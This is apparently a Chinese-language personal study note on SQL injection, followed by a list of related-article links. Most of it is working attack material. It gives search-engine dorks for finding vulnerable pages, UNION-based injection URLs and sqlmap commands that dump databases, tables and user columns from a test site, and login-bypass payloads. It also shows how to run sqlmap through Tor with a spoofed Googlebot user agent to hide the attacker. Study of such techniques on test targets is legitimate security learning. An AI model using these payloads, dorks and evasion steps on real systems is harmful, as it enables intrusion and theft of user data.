sql注入學習簡單記錄
Google search:
inurl:”products.php?prodID=”
inurl:buy.php?category=
http://testphp.vulnweb.com/listproducts.php?cat=1
http://testphp.vulnweb.com/listproducts.php?cat=`
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+1
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+6
http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version
有時伺服器不能直接理解@@ version命令,需要轉換它。您將需要使用convert(@@版本使用latin1)或unhex(hex(@@版本))替換@@版本。
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –time-sec 15
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –dbs
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart –tables
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users –columns
SQL隱碼攻擊的型別
經典SQLI
盲注或推斷SQL隱碼攻擊資料庫管理系統
特定的SQLI
複合SQLI
SQL隱碼攻擊+認證不足
SQL隱碼攻擊+ DDoS 攻擊
SQL隱碼攻擊+ DNS劫持
SQL隱碼攻擊+ XSS
錯誤過濾的轉義字元
當使用者輸入未針對轉義字元 進行過濾時,會發生這種形式的SQL隱碼攻擊 ,然後將其傳遞到SQL語句
statement = “SELECT*FROM users WHERE name =`” + userName + “`;”
使用註釋甚至阻止查詢的其餘部分(有三種型別的SQL註釋)。所有三行最後都有一個空格:
` or `1`=`1` —
` or `1`=`1` ({
` or `1`=`1` /*
http://books.example.com/showReview.php?ID=5 AND substring(@@version,1,1)=4
apt-get instal tor
tor
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 –tor –tor-type=SOCKS5
偽裝成Googlebot:
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 –tor –tor-type=SOCKS5 –user-agent=”Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”
相關文章
- sql注入簡單總結SQL
- 小白的學習記錄——Redis的簡單使用Redis
- 簡單的SQL語句學習SQL
- sql注入waf繞過簡單入門SQL
- 演算法學習---歸併演算法簡單記錄演算法
- 簡單記錄幾個有用的sql查詢SQL
- 學習記錄-Laravel 核心 依賴注入 控制反轉 反射Laravel依賴注入反射
- Git 簡單使用學習筆記Git筆記
- (一)《SQL進階教程》學習記錄--CASESQL
- SQL Server中的鎖的簡單學習SQLServer
- Burp Suite學習記錄1 - 簡介UI
- 實戰記錄之SQL server報錯手工注入SQLServer
- (二)《SQL進階教程》學習記錄--GROUP BY、PARTITION BYSQL
- 學習記錄
- 學習達夢hint注入筆記筆記
- 【每日學習記錄】使用錄影裝置記錄每天的學習
- SpringMVC學習記錄(五)--表單標籤SpringMVC
- 使用者下單+微信支付學習記錄
- Oracle 查詢重複記錄,以及簡單的sql應用。OracleSQL
- 記錄學習PromisePromise
- windbg學習記錄
- Eureka學習記錄
- Mybatis學習記錄MyBatis
- socket學習記錄
- JQuery學習記錄jQuery
- larabbs 學習記錄
- Tableau學習記錄
- MySQL學習記錄MySql
- Elasticsearch學習記錄Elasticsearch
- swift學習記錄Swift
- jQuery 學習記錄jQuery
- RAC 學習記錄
- RMAN學習記錄
- RAC學習記錄
- JAVA學習記錄Java
- Docker學習記錄Docker
- activiti學習記錄
- 學習記錄APPAPP